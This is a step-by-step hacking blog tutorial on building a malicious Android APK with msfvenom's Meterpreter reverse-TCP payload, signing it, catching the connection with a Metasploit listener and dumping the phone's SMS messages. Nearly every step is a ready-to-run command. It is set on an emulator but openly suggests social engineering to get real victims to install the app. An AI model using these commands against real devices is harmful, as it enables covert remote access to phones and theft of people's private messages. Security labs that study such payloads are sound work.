• Lucifer

Android Exploitation

In previous posts, we saw how Android devices can be used for penetration testing. Let’s reverse the sides and use our Android device as the target. In this post, we will learn how to create an APK file using the tools offered by Metasploit Framework. We will focus on Metasploit's Android-based payloads and use msfvenom to create the APK file.

Android Exploitation

Step 1: Creating APK


Enter the following command to generate the APK file that will be distributed to the victim:


msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.2 LPORT=4444 R > SignApk/evilAndroid.apk

Android Exploitation

We are entering 10.0.2.2 for "local host" because this is the IP that the emulator uses to communicate with the host computer.


It will take 2-3 minutes for the file to be created.


Step 2: Changing Directories


Once our APK is created, we will need to sign the file. This is an essential step because most Android devices won't install unsigned applications. Signing an APK is a multi-step process, however, we can simplify it by using a pre-generated certificate and key files with the signapk.jar utility. We saved them all in the same directory where we put our APK. Change to this directory as follows:

cd SignApk

Android Exploitation

Step 3: Signing APK


Run the command below to sign the APK. Our signed file will be saved as evilAndroidc.apk.

java -jar signapk.jar certificate.pem key.pk8 evilAndroid.apk evilAndroidc.apk

Android Exploitation

To make sure that the file was created, do the listing of the working directory:

ls


Step 4: Starting Metasploit Listener


Now let's start Metasploit listener. We've done the step-by-step setup in other labs, now let's do it it all at once, with a one-liner command:

msfconsole -L -q -x "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 4444; run"

Android Exploitation

The -q option is for "quiet" which disables the displaying banner and version information. Note that we are using the actual localhost IP this time, not the one that Android uses.

Now open up a new tab with help of the following command: Ctrl + Shift + T


Step 5: Starting Android Emulator


Enter the following command to start the Android emulator instance that we will use as our target:

android-sdk-linux/tools/emulator @android17 -no-window

Android Exploitation

It may take several minutes for the emulator instance to start. Be patient.


Step 6: Migrating Consoles


Next, we need to upload our malicious APK. In a real life scenario, you will need to use some social engineering techniques to trick the device owner into downloading and installing your APK. Let's say we did that and now we will play the victim.

Open up a new tab "Tab 3".


Step 7: Installing APK


To install the APK, enter the command below. Make sure to use the signed version of the APK: evilAdnroidc.apk, not the original evilAndroid.apk:

adb install SignApk/evilAndroidc.apk

Android Exploitation

You will get the "device offline" error at first: it takes some time for the emulated device to connect to the ADB server. If returned to prompt, try again. Keep re-entering the command until you see the "Success" message (you may have to try several times).

Step 8: Launching App


Next, we need to launch the application. Opening apps from command line is a bit tricky: you need to know the name of the package and of the Activity. We looked it up for you, so just enter the following command to run the app:


adb shell am start com.metasploit.stage/.MainActivity

Android Exploitation

Step 9: Getting a Shell


Now go back to the Metasploit listener running in "Console Tab 1".

Android Exploitation

We got a Meterpreter shell!


Step 10: Using Meterpreter on Android


Android Meterpreter is similar to the Linux version that we used in other labs, however, it has some unique options as well. Enter help to see the available commands.

help

Android Exploitation

Step 11: Getting System Information


Enter sysinfo to get information about the target system:

sysinfo

Android Exploitation

Step 12: Migrating Consoles


One of the most useful Meterpreter options is dump_sms, which does just that: dumping all SMS messages from the device into a text file.

Migrate to "Console tab 3" to send an SMS message to our device.

Step 13: Sending SMS


We can use Telnet to send SMS messages to emulated devices. First, open a Telnet session as follows:

telnet localhost 5554

Android Exploitation

Next, enter sms send followed by a phone number and message. You can use any values for these, just don't include any dashes in the phone number and make sure that your message is in quotes, for example:

sms send 1112223333 "Hey there"


Now again switch back to console tab 1.


Step 14: Dumping SMS


Enter the* dump_sms *command:

dump_sms

Android Exploitation

Note the name of the dump file. It will be saved in the current working directory. Enter exit twice to close the Meterpreter shell and exit out of Metasploit.


Step 15: Reading SMS Dump


Enter the following command to read the SMS file (enter the file name with your timestamp):

cat sms_dump_<timestamp>.txt

Android Exploitation

We can see the contents of the messages as well as the associated metadata.


Also read: Hacking with Android


That's it for this post hope you like it, please share it with your friends and more amazing stuff is waiting for you, checkout shop at Payground or visit HERE.

 
Join Telegram Group

©2020 by Payground. Proudly created with Wix.com